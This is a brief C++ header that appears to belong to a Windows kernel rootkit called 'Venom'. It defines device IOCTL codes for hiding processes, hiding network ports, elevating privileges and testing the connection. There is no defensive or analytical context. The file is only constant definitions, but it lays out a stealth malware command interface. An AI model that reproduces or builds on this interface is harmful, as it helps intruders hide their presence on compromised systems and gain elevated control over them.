#pragma once

constexpr int VENOM_DEVICE = 0x8000;

enum class VenomIoctls {
	HideProcces = CTL_CODE(VENOM_DEVICE, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS),
	TestConnection = CTL_CODE(VENOM_DEVICE, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS),
	Elevate = CTL_CODE(VENOM_DEVICE, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS),
	HidePort = CTL_CODE(VENOM_DEVICE, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)
};